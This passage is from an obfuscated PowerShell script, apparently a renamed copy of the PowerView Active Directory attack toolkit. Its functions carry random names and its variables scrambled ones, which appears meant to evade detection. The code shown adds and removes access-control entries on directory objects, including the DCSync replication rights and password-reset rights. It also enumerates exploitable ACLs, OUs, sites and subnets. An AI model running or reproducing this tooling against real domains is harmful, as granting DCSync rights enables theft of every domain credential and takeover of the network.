'WriteMembers' { 'bf9679c0-0de6-11d0-a285-00aa003049e2' } | |
'DCSync' { '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2', '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2', '89e95b76-444d-4c62-991a-0facbeda640c'} | |
} | |
} | |
ForEach ($FXjmNLES99 in $LlCCFCeG99) { | |
Write-Verbose "[enchant] Granting principal $($FXjmNLES99.distinguishedname) '$DQsrHUMr99' on $($BOGxsDDD99.Properties.distinguishedname)" | |
try { | |
$mxWgOMSt99 = [System.Security.Principal.IdentityReference] ([System.Security.Principal.SecurityIdentifier]$FXjmNLES99.objectsid) | |
if ($GUIDs) { | |
ForEach ($GUID in $GUIDs) { | |
$VwBQOHMq99 = New-Object Guid $GUID | |
$YOysesub99 = [System.DirectoryServices.ActiveDirectoryRights] 'ExtendedRight' | |
$ACEs += New-Object System.DirectoryServices.ActiveDirectoryAccessRule $mxWgOMSt99, $YOysesub99, $EgtRgneQ99, $VwBQOHMq99, $JnqKNagc99 | |
} | |
} | |
else { | |
$YOysesub99 = [System.DirectoryServices.ActiveDirectoryRights] 'GenericAll' | |
$ACEs += New-Object System.DirectoryServices.ActiveDirectoryAccessRule $mxWgOMSt99, $YOysesub99, $EgtRgneQ99, $JnqKNagc99 | |
} | |
ForEach ($ACE in $ACEs) { | |
Write-Verbose "[enchant] Granting principal $($FXjmNLES99.distinguishedname) rights GUID '$($ACE.ObjectType)' on $($BOGxsDDD99.Properties.distinguishedname)" | |
$hhAsIELo99 = $BOGxsDDD99.GetDirectoryEntry() | |
$hhAsIELo99.PsBase.Options.SecurityMasks = 'Dacl' | |
$hhAsIELo99.PsBase.ObjectSecurity.AddAccessRule($ACE) | |
$hhAsIELo99.PsBase.CommitChanges() | |
} | |
} | |
catch { | |
Write-Verbose "[enchant] Error granting principal $($FXjmNLES99.distinguishedname) '$DQsrHUMr99' on $($BOGxsDDD99.Properties.distinguishedname) : $_" | |
} | |
} | |
} | |
} | |
} | |
function verticals { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[CmdletBinding()] | |
Param ( | |
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('DistinguishedName', 'SamAccountName', 'Name')] | |
[String[]] | |
$OLwIZxWj99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ShZaeqLs99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('Filter')] | |
[String] | |
$EyPPBjzO99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$QrFNsnQt99, | |
[Parameter(Mandatory = $True)] | |
[ValidateNotNullOrEmpty()] | |
[String[]] | |
$gNyvWtjE99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$iKYisJVQ99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('DomainController')] | |
[String] | |
$CbStbNZR99, | |
[ValidateSet('Base', 'OneLevel', 'Subtree')] | |
[String] | |
$gEzbtCrD99 = 'Subtree', | |
[ValidateRange(1, 10000)] | |
[Int] | |
$uTURXKBm99 = 200, | |
[ValidateRange(1, 10000)] | |
[Int] | |
$ucLpCRIr99, | |
[Switch] | |
$DPTKXMKA99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty, | |
[ValidateSet('All', 'ResetPassword', 'WriteMembers', 'DCSync')] | |
[String] | |
$DQsrHUMr99 = 'All', | |
[Guid] | |
$BgWfrqAx99 | |
) | |
BEGIN { | |
$SbiFercq99 = @{ | |
'Properties' = 'distinguishedname' | |
'Raw' = $True | |
} | |
if ($PSBoundParameters['TargetDomain']) { $SbiFercq99['Domain'] = $ShZaeqLs99 } | |
if ($PSBoundParameters['TargetLDAPFilter']) { $SbiFercq99['LDAPFilter'] = $EyPPBjzO99 } | |
if ($PSBoundParameters['TargetSearchBase']) { $SbiFercq99['SearchBase'] = $QrFNsnQt99 } | |
if ($PSBoundParameters['Server']) { $SbiFercq99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['SearchScope']) { $SbiFercq99['SearchScope'] = $gEzbtCrD99 } | |
if ($PSBoundParameters['ResultPageSize']) { $SbiFercq99['ResultPageSize'] = $uTURXKBm99 } | |
if ($PSBoundParameters['ServerTimeLimit']) { $SbiFercq99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['Tombstone']) { $SbiFercq99['Tombstone'] = $DPTKXMKA99 } | |
if ($PSBoundParameters['Credential']) { $SbiFercq99['Credential'] = $KWcDeQDF99 } | |
$zMGdzapz99 = @{ | |
'Identity' = $gNyvWtjE99 | |
'Properties' = 'distinguishedname,objectsid' | |
} | |
if ($PSBoundParameters['PrincipalDomain']) { $zMGdzapz99['Domain'] = $iKYisJVQ99 } | |
if ($PSBoundParameters['Server']) { $zMGdzapz99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['SearchScope']) { $zMGdzapz99['SearchScope'] = $gEzbtCrD99 } | |
if ($PSBoundParameters['ResultPageSize']) { $zMGdzapz99['ResultPageSize'] = $uTURXKBm99 } | |
if ($PSBoundParameters['ServerTimeLimit']) { $zMGdzapz99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['Tombstone']) { $zMGdzapz99['Tombstone'] = $DPTKXMKA99 } | |
if ($PSBoundParameters['Credential']) { $zMGdzapz99['Credential'] = $KWcDeQDF99 } | |
$LlCCFCeG99 = sniffling @PrincipalSearcherArguments | |
if (-not $LlCCFCeG99) { | |
throw "Unable to resolve principal: $gNyvWtjE99" | |
} | |
} | |
PROCESS { | |
$SbiFercq99['Identity'] = $OLwIZxWj99 | |
$jFmDhuwP99 = sniffling @TargetSearcherArguments | |
ForEach ($BOGxsDDD99 in $jFmDhuwP99) { | |
$JnqKNagc99 = [System.DirectoryServices.ActiveDirectorySecurityInheritance] 'None' | |
$EgtRgneQ99 = [System.Security.AccessControl.AccessControlType] 'Allow' | |
$ACEs = @() | |
if ($BgWfrqAx99) { | |
$GUIDs = @($BgWfrqAx99) | |
} | |
else { | |
$GUIDs = Switch ($DQsrHUMr99) { | |
'ResetPassword' { '00299570-246d-11d0-a768-00aa006e0529' } | |
'WriteMembers' { 'bf9679c0-0de6-11d0-a285-00aa003049e2' } | |
'DCSync' { '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2', '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2', '89e95b76-444d-4c62-991a-0facbeda640c'} | |
} | |
} | |
ForEach ($FXjmNLES99 in $LlCCFCeG99) { | |
Write-Verbose "[verticals] Removing principal $($FXjmNLES99.distinguishedname) '$DQsrHUMr99' from $($BOGxsDDD99.Properties.distinguishedname)" | |
try { | |
$mxWgOMSt99 = [System.Security.Principal.IdentityReference] ([System.Security.Principal.SecurityIdentifier]$FXjmNLES99.objectsid) | |
if ($GUIDs) { | |
ForEach ($GUID in $GUIDs) { | |
$VwBQOHMq99 = New-Object Guid $GUID | |
$YOysesub99 = [System.DirectoryServices.ActiveDirectoryRights] 'ExtendedRight' | |
$ACEs += New-Object System.DirectoryServices.ActiveDirectoryAccessRule $mxWgOMSt99, $YOysesub99, $EgtRgneQ99, $VwBQOHMq99, $JnqKNagc99 | |
} | |
} | |
else { | |
$YOysesub99 = [System.DirectoryServices.ActiveDirectoryRights] 'GenericAll' | |
$ACEs += New-Object System.DirectoryServices.ActiveDirectoryAccessRule $mxWgOMSt99, $YOysesub99, $EgtRgneQ99, $JnqKNagc99 | |
} | |
ForEach ($ACE in $ACEs) { | |
Write-Verbose "[verticals] Granting principal $($FXjmNLES99.distinguishedname) rights GUID '$($ACE.ObjectType)' on $($BOGxsDDD99.Properties.distinguishedname)" | |
$hhAsIELo99 = $BOGxsDDD99.GetDirectoryEntry() | |
$hhAsIELo99.PsBase.Options.SecurityMasks = 'Dacl' | |
$hhAsIELo99.PsBase.ObjectSecurity.RemoveAccessRule($ACE) | |
$hhAsIELo99.PsBase.CommitChanges() | |
} | |
} | |
catch { | |
Write-Verbose "[verticals] Error removing principal $($FXjmNLES99.distinguishedname) '$DQsrHUMr99' from $($BOGxsDDD99.Properties.distinguishedname) : $_" | |
} | |
} | |
} | |
} | |
} | |
function Poirot { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType('PowerView.ACL')] | |
[CmdletBinding()] | |
Param ( | |
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('DomainName', 'Name')] | |
[String] | |
$ADDDGomQ99, | |
[Switch] | |
$RPwTouXm99, | |
[String] | |
[ValidateSet('All', 'ResetPassword', 'WriteMembers')] | |
$WCHIsHfL99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('Filter')] | |
[String] | |
$hzaXgjDv99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('ADSPath')] | |
[String] | |
$GNYlaBrE99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('DomainController')] | |
[String] | |
$CbStbNZR99, | |
[ValidateSet('Base', 'OneLevel', 'Subtree')] | |
[String] | |
$gEzbtCrD99 = 'Subtree', | |
[ValidateRange(1, 10000)] | |
[Int] | |
$uTURXKBm99 = 200, | |
[ValidateRange(1, 10000)] | |
[Int] | |
$ucLpCRIr99, | |
[Switch] | |
$DPTKXMKA99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
BEGIN { | |
$kuNRXcxd99 = @{} | |
if ($PSBoundParameters['ResolveGUIDs']) { $kuNRXcxd99['ResolveGUIDs'] = $RPwTouXm99 } | |
if ($PSBoundParameters['RightsFilter']) { $kuNRXcxd99['RightsFilter'] = $WCHIsHfL99 } | |
if ($PSBoundParameters['LDAPFilter']) { $kuNRXcxd99['LDAPFilter'] = $hzaXgjDv99 } | |
if ($PSBoundParameters['SearchBase']) { $kuNRXcxd99['SearchBase'] = $GNYlaBrE99 } | |
if ($PSBoundParameters['Server']) { $kuNRXcxd99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['SearchScope']) { $kuNRXcxd99['SearchScope'] = $gEzbtCrD99 } | |
if ($PSBoundParameters['ResultPageSize']) { $kuNRXcxd99['ResultPageSize'] = $uTURXKBm99 } | |
if ($PSBoundParameters['ServerTimeLimit']) { $kuNRXcxd99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['Tombstone']) { $kuNRXcxd99['Tombstone'] = $DPTKXMKA99 } | |
if ($PSBoundParameters['Credential']) { $kuNRXcxd99['Credential'] = $KWcDeQDF99 } | |
$NiiUklGc99 = @{ | |
'Properties' = 'samaccountname,objectclass' | |
'Raw' = $True | |
} | |
if ($PSBoundParameters['Server']) { $NiiUklGc99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['SearchScope']) { $NiiUklGc99['SearchScope'] = $gEzbtCrD99 } | |
if ($PSBoundParameters['ResultPageSize']) { $NiiUklGc99['ResultPageSize'] = $uTURXKBm99 } | |
if ($PSBoundParameters['ServerTimeLimit']) { $NiiUklGc99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['Tombstone']) { $NiiUklGc99['Tombstone'] = $DPTKXMKA99 } | |
if ($PSBoundParameters['Credential']) { $NiiUklGc99['Credential'] = $KWcDeQDF99 } | |
$RFXZSNQH99 = @{} | |
if ($PSBoundParameters['Server']) { $RFXZSNQH99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['Credential']) { $RFXZSNQH99['Credential'] = $KWcDeQDF99 } | |
$vYHMjEPU99 = @{} | |
} | |
PROCESS { | |
if ($PSBoundParameters['Domain']) { | |
$kuNRXcxd99['Domain'] = $ADDDGomQ99 | |
$RFXZSNQH99['Domain'] = $ADDDGomQ99 | |
} | |
hatch @ACLArguments | ForEach-Object { | |
if ( ($_.ActiveDirectoryRights -match 'GenericAll|Write|Create|Delete') -or (($_.ActiveDirectoryRights -match 'ExtendedRight') -and ($_.AceQualifier -match 'Allow'))) { | |
if ($_.SecurityIdentifier.Value -match '^S-1-5-.*-[1-9]\d{3,}$') { | |
if ($vYHMjEPU99[$_.SecurityIdentifier.Value]) { | |
$peSPYPkL99, $rkvTcCeJ99, $OYuhrjfe99, $AHZwNhuS99 = $vYHMjEPU99[$_.SecurityIdentifier.Value] | |
$UfkrADTx99 = New-Object PSObject | |
$UfkrADTx99 | Add-Member NoteProperty 'ObjectDN' $_.ObjectDN | |
$UfkrADTx99 | Add-Member NoteProperty 'AceQualifier' $_.AceQualifier | |
$UfkrADTx99 | Add-Member NoteProperty 'ActiveDirectoryRights' $_.ActiveDirectoryRights | |
if ($_.ObjectAceType) { | |
$UfkrADTx99 | Add-Member NoteProperty 'ObjectAceType' $_.ObjectAceType | |
} | |
else { | |
$UfkrADTx99 | Add-Member NoteProperty 'ObjectAceType' 'None' | |
} | |
$UfkrADTx99 | Add-Member NoteProperty 'AceFlags' $_.AceFlags | |
$UfkrADTx99 | Add-Member NoteProperty 'AceType' $_.AceType | |
$UfkrADTx99 | Add-Member NoteProperty 'InheritanceFlags' $_.InheritanceFlags | |
$UfkrADTx99 | Add-Member NoteProperty 'SecurityIdentifier' $_.SecurityIdentifier | |
$UfkrADTx99 | Add-Member NoteProperty 'IdentityReferenceName' $peSPYPkL99 | |
$UfkrADTx99 | Add-Member NoteProperty 'IdentityReferenceDomain' $rkvTcCeJ99 | |
$UfkrADTx99 | Add-Member NoteProperty 'IdentityReferenceDN' $OYuhrjfe99 | |
$UfkrADTx99 | Add-Member NoteProperty 'IdentityReferenceClass' $AHZwNhuS99 | |
$UfkrADTx99 | |
} | |
else { | |
$OYuhrjfe99 = plagiarist -mxWgOMSt99 $_.SecurityIdentifier.Value -sVUXjDxI99 DN @ADNameArguments | |
if ($OYuhrjfe99) { | |
$rkvTcCeJ99 = $OYuhrjfe99.SubString($OYuhrjfe99.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' | |
$NiiUklGc99['Domain'] = $rkvTcCeJ99 | |
$NiiUklGc99['Identity'] = $OYuhrjfe99 | |
$Object = sniffling @ObjectSearcherArguments | |
if ($Object) { | |
$peSPYPkL99 = $Object.Properties.samaccountname[0] | |
if ($Object.Properties.objectclass -match 'computer') { | |
$AHZwNhuS99 = 'computer' | |
} | |
elseif ($Object.Properties.objectclass -match 'group') { | |
$AHZwNhuS99 = 'group' | |
} | |
elseif ($Object.Properties.objectclass -match 'user') { | |
$AHZwNhuS99 = 'user' | |
} | |
else { | |
$AHZwNhuS99 = $Null | |
} | |
$vYHMjEPU99[$_.SecurityIdentifier.Value] = $peSPYPkL99, $rkvTcCeJ99, $OYuhrjfe99, $AHZwNhuS99 | |
$UfkrADTx99 = New-Object PSObject | |
$UfkrADTx99 | Add-Member NoteProperty 'ObjectDN' $_.ObjectDN | |
$UfkrADTx99 | Add-Member NoteProperty 'AceQualifier' $_.AceQualifier | |
$UfkrADTx99 | Add-Member NoteProperty 'ActiveDirectoryRights' $_.ActiveDirectoryRights | |
if ($_.ObjectAceType) { | |
$UfkrADTx99 | Add-Member NoteProperty 'ObjectAceType' $_.ObjectAceType | |
} | |
else { | |
$UfkrADTx99 | Add-Member NoteProperty 'ObjectAceType' 'None' | |
} | |
$UfkrADTx99 | Add-Member NoteProperty 'AceFlags' $_.AceFlags | |
$UfkrADTx99 | Add-Member NoteProperty 'AceType' $_.AceType | |
$UfkrADTx99 | Add-Member NoteProperty 'InheritanceFlags' $_.InheritanceFlags | |
$UfkrADTx99 | Add-Member NoteProperty 'SecurityIdentifier' $_.SecurityIdentifier | |
$UfkrADTx99 | Add-Member NoteProperty 'IdentityReferenceName' $peSPYPkL99 | |
$UfkrADTx99 | Add-Member NoteProperty 'IdentityReferenceDomain' $rkvTcCeJ99 | |
$UfkrADTx99 | Add-Member NoteProperty 'IdentityReferenceDN' $OYuhrjfe99 | |
$UfkrADTx99 | Add-Member NoteProperty 'IdentityReferenceClass' $AHZwNhuS99 | |
$UfkrADTx99 | |
} | |
} | |
else { | |
Write-Warning "[Poirot] Unable to convert SID '$($_.SecurityIdentifier.Value )' to a distinguishedname with plagiarist" | |
} | |
} | |
} | |
} | |
} | |
} | |
} | |
function stancher { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType('PowerView.OU')] | |
[CmdletBinding()] | |
Param ( | |
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('Name')] | |
[String[]] | |
$mxWgOMSt99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
[Alias('GUID')] | |
$DGgEtKNM99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ADDDGomQ99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('Filter')] | |
[String] | |
$hzaXgjDv99, | |
[ValidateNotNullOrEmpty()] | |
[String[]] | |
$nmZxBYze99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('ADSPath')] | |
[String] | |
$GNYlaBrE99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('DomainController')] | |
[String] | |
$CbStbNZR99, | |
[ValidateSet('Base', 'OneLevel', 'Subtree')] | |
[String] | |
$gEzbtCrD99 = 'Subtree', | |
[ValidateRange(1, 10000)] | |
[Int] | |
$uTURXKBm99 = 200, | |
[ValidateRange(1, 10000)] | |
[Int] | |
$ucLpCRIr99, | |
[ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')] | |
[String] | |
$FaXdBAYg99, | |
[Switch] | |
$DPTKXMKA99, | |
[Alias('ReturnOne')] | |
[Switch] | |
$YIVtKGKK99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty, | |
[Switch] | |
$Raw | |
) | |
BEGIN { | |
$ufgcNRNN99 = @{} | |
if ($PSBoundParameters['Domain']) { $ufgcNRNN99['Domain'] = $ADDDGomQ99 } | |
if ($PSBoundParameters['Properties']) { $ufgcNRNN99['Properties'] = $nmZxBYze99 } | |
if ($PSBoundParameters['SearchBase']) { $ufgcNRNN99['SearchBase'] = $GNYlaBrE99 } | |
if ($PSBoundParameters['Server']) { $ufgcNRNN99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['SearchScope']) { $ufgcNRNN99['SearchScope'] = $gEzbtCrD99 } | |
if ($PSBoundParameters['ResultPageSize']) { $ufgcNRNN99['ResultPageSize'] = $uTURXKBm99 } | |
if ($PSBoundParameters['ServerTimeLimit']) { $ufgcNRNN99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['SecurityMasks']) { $ufgcNRNN99['SecurityMasks'] = $FaXdBAYg99 } | |
if ($PSBoundParameters['Tombstone']) { $ufgcNRNN99['Tombstone'] = $DPTKXMKA99 } | |
if ($PSBoundParameters['Credential']) { $ufgcNRNN99['Credential'] = $KWcDeQDF99 } | |
$nHKOCAwC99 = Richelieu @SearcherArguments | |
} | |
PROCESS { | |
if ($nHKOCAwC99) { | |
$btfCLlYC99 = '' | |
$IUDzHsEr99 = '' | |
$mxWgOMSt99 | Where-Object {$_} | ForEach-Object { | |
$KzBFOtcK99 = $_.Replace('(', '\28').Replace(')', '\29') | |
if ($KzBFOtcK99 -match '^OU=.*') { | |
$btfCLlYC99 += "(distinguishedname=$KzBFOtcK99)" | |
if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) { | |
$wXLTskQJ99 = $KzBFOtcK99.SubString($KzBFOtcK99.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' | |
Write-Verbose "[stancher] Extracted domain '$wXLTskQJ99' from '$KzBFOtcK99'" | |
$ufgcNRNN99['Domain'] = $wXLTskQJ99 | |
$nHKOCAwC99 = Richelieu @SearcherArguments | |
if (-not $nHKOCAwC99) { | |
Write-Warning "[stancher] Unable to retrieve domain searcher for '$wXLTskQJ99'" | |
} | |
} | |
} | |
else { | |
try { | |
$jjIYltxr99 = (-Join (([Guid]$KzBFOtcK99).ToByteArray() | ForEach-Object {$_.ToString('X').PadLeft(2,'0')})) -Replace '(..)','\$1' | |
$btfCLlYC99 += "(objectguid=$jjIYltxr99)" | |
} | |
catch { | |
$btfCLlYC99 += "(name=$KzBFOtcK99)" | |
} | |
} | |
} | |
if ($btfCLlYC99 -and ($btfCLlYC99.Trim() -ne '') ) { | |
$IUDzHsEr99 += "(|$btfCLlYC99)" | |
} | |
if ($PSBoundParameters['GPLink']) { | |
Write-Verbose "[stancher] Searching for OUs with $DGgEtKNM99 set in the gpLink property" | |
$IUDzHsEr99 += "(gplink=*$DGgEtKNM99*)" | |
} | |
if ($PSBoundParameters['LDAPFilter']) { | |
Write-Verbose "[stancher] Using additional LDAP filter: $hzaXgjDv99" | |
$IUDzHsEr99 += "$hzaXgjDv99" | |
} | |
$nHKOCAwC99.filter = "(&(objectCategory=organizationalUnit)$IUDzHsEr99)" | |
Write-Verbose "[stancher] stancher filter string: $($nHKOCAwC99.filter)" | |
if ($PSBoundParameters['FindOne']) { $hCEVDJUr99 = $nHKOCAwC99.FindOne() } | |
else { $hCEVDJUr99 = $nHKOCAwC99.FindAll() } | |
$hCEVDJUr99 | Where-Object {$_} | ForEach-Object { | |
if ($PSBoundParameters['Raw']) { | |
$OU = $_ | |
} | |
else { | |
$OU = epicure -nmZxBYze99 $_.Properties | |
} | |
$OU.PSObject.TypeNames.Insert(0, 'PowerView.OU') | |
$OU | |
} | |
if ($hCEVDJUr99) { | |
try { $hCEVDJUr99.dispose() } | |
catch { | |
Write-Verbose "[stancher] Error disposing of the Results object: $_" | |
} | |
} | |
$nHKOCAwC99.dispose() | |
} | |
} | |
} | |
function billionaire { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType('PowerView.Site')] | |
[CmdletBinding()] | |
Param ( | |
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('Name')] | |
[String[]] | |
$mxWgOMSt99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
[Alias('GUID')] | |
$DGgEtKNM99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ADDDGomQ99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('Filter')] | |
[String] | |
$hzaXgjDv99, | |
[ValidateNotNullOrEmpty()] | |
[String[]] | |
$nmZxBYze99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('ADSPath')] | |
[String] | |
$GNYlaBrE99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('DomainController')] | |
[String] | |
$CbStbNZR99, | |
[ValidateSet('Base', 'OneLevel', 'Subtree')] | |
[String] | |
$gEzbtCrD99 = 'Subtree', | |
[ValidateRange(1, 10000)] | |
[Int] | |
$uTURXKBm99 = 200, | |
[ValidateRange(1, 10000)] | |
[Int] | |
$ucLpCRIr99, | |
[ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')] | |
[String] | |
$FaXdBAYg99, | |
[Switch] | |
$DPTKXMKA99, | |
[Alias('ReturnOne')] | |
[Switch] | |
$YIVtKGKK99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty, | |
[Switch] | |
$Raw | |
) | |
BEGIN { | |
$ufgcNRNN99 = @{ | |
'SearchBasePrefix' = 'CN=Sites,CN=Configuration' | |
} | |
if ($PSBoundParameters['Domain']) { $ufgcNRNN99['Domain'] = $ADDDGomQ99 } | |
if ($PSBoundParameters['Properties']) { $ufgcNRNN99['Properties'] = $nmZxBYze99 } | |
if ($PSBoundParameters['SearchBase']) { $ufgcNRNN99['SearchBase'] = $GNYlaBrE99 } | |
if ($PSBoundParameters['Server']) { $ufgcNRNN99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['SearchScope']) { $ufgcNRNN99['SearchScope'] = $gEzbtCrD99 } | |
if ($PSBoundParameters['ResultPageSize']) { $ufgcNRNN99['ResultPageSize'] = $uTURXKBm99 } | |
if ($PSBoundParameters['ServerTimeLimit']) { $ufgcNRNN99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['SecurityMasks']) { $ufgcNRNN99['SecurityMasks'] = $FaXdBAYg99 } | |
if ($PSBoundParameters['Tombstone']) { $ufgcNRNN99['Tombstone'] = $DPTKXMKA99 } | |
if ($PSBoundParameters['Credential']) { $ufgcNRNN99['Credential'] = $KWcDeQDF99 } | |
$THkWlZuj99 = Richelieu @SearcherArguments | |
} | |
PROCESS { | |
if ($THkWlZuj99) { | |
$btfCLlYC99 = '' | |
$IUDzHsEr99 = '' | |
$mxWgOMSt99 | Where-Object {$_} | ForEach-Object { | |
$KzBFOtcK99 = $_.Replace('(', '\28').Replace(')', '\29') | |
if ($KzBFOtcK99 -match '^CN=.*') { | |
$btfCLlYC99 += "(distinguishedname=$KzBFOtcK99)" | |
if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) { | |
$wXLTskQJ99 = $KzBFOtcK99.SubString($KzBFOtcK99.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' | |
Write-Verbose "[billionaire] Extracted domain '$wXLTskQJ99' from '$KzBFOtcK99'" | |
$ufgcNRNN99['Domain'] = $wXLTskQJ99 | |
$THkWlZuj99 = Richelieu @SearcherArguments | |
if (-not $THkWlZuj99) { | |
Write-Warning "[billionaire] Unable to retrieve domain searcher for '$wXLTskQJ99'" | |
} | |
} | |
} | |
else { | |
try { | |
$jjIYltxr99 = (-Join (([Guid]$KzBFOtcK99).ToByteArray() | ForEach-Object {$_.ToString('X').PadLeft(2,'0')})) -Replace '(..)','\$1' | |
$btfCLlYC99 += "(objectguid=$jjIYltxr99)" | |
} | |
catch { | |
$btfCLlYC99 += "(name=$KzBFOtcK99)" | |
} | |
} | |
} | |
if ($btfCLlYC99 -and ($btfCLlYC99.Trim() -ne '') ) { | |
$IUDzHsEr99 += "(|$btfCLlYC99)" | |
} | |
if ($PSBoundParameters['GPLink']) { | |
Write-Verbose "[billionaire] Searching for sites with $DGgEtKNM99 set in the gpLink property" | |
$IUDzHsEr99 += "(gplink=*$DGgEtKNM99*)" | |
} | |
if ($PSBoundParameters['LDAPFilter']) { | |
Write-Verbose "[billionaire] Using additional LDAP filter: $hzaXgjDv99" | |
$IUDzHsEr99 += "$hzaXgjDv99" | |
} | |
$THkWlZuj99.filter = "(&(objectCategory=site)$IUDzHsEr99)" | |
Write-Verbose "[billionaire] billionaire filter string: $($THkWlZuj99.filter)" | |
if ($PSBoundParameters['FindOne']) { $hCEVDJUr99 = $THkWlZuj99.FindAll() } | |
else { $hCEVDJUr99 = $THkWlZuj99.FindAll() } | |
$hCEVDJUr99 | Where-Object {$_} | ForEach-Object { | |
if ($PSBoundParameters['Raw']) { | |
$Site = $_ | |
} | |
else { | |
$Site = epicure -nmZxBYze99 $_.Properties | |
} | |
$Site.PSObject.TypeNames.Insert(0, 'PowerView.Site') | |
$Site | |
} | |
if ($hCEVDJUr99) { | |
try { $hCEVDJUr99.dispose() } | |
catch { | |
Write-Verbose "[billionaire] Error disposing of the Results object" | |
} | |
} | |
$THkWlZuj99.dispose() | |
} | |
} | |
} | |
function Wesak { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType('PowerView.Subnet')] | |
[CmdletBinding()] | |
Param ( | |
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('Name')] | |
[String[]] | |
$mxWgOMSt99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ZbNKanPP99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ADDDGomQ99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('Filter')] | |
[String] | |
$hzaXgjDv99, | |
[ValidateNotNullOrEmpty()] | |
[String[]] | |
$nmZxBYze99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('ADSPath')] | |
[String] | |
$GNYlaBrE99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('DomainController')] | |
[String] | |
$CbStbNZR99, | |
[ValidateSet('Base', 'OneLevel', 'Subtree')] | |
[String] | |
$gEzbtCrD99 = 'Subtree', | |
[ValidateRange(1, 10000)] | |
[Int] | |
$uTURXKBm99 = 200, | |
[ValidateRange(1, 10000)] | |
[Int] | |
$ucLpCRIr99, | |
[ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')] | |
[String] | |
$FaXdBAYg99, | |
[Switch] | |
$DPTKXMKA99, | |
[Alias('ReturnOne')] | |
[Switch] | |
$YIVtKGKK99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty, | |
[Switch] | |
$Raw | |
) | |
BEGIN { | |
$ufgcNRNN99 = @{ | |
'SearchBasePrefix' = 'CN=Subnets,CN=Sites,CN=Configuration' | |
} | |
if ($PSBoundParameters['Domain']) { $ufgcNRNN99['Domain'] = $ADDDGomQ99 } | |
if ($PSBoundParameters['Properties']) { $ufgcNRNN99['Properties'] = $nmZxBYze99 } | |
if ($PSBoundParameters['SearchBase']) { $ufgcNRNN99['SearchBase'] = $GNYlaBrE99 } | |
if ($PSBoundParameters['Server']) { $ufgcNRNN99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['SearchScope']) { $ufgcNRNN99['SearchScope'] = $gEzbtCrD99 } | |
if ($PSBoundParameters['ResultPageSize']) { $ufgcNRNN99['ResultPageSize'] = $uTURXKBm99 } | |
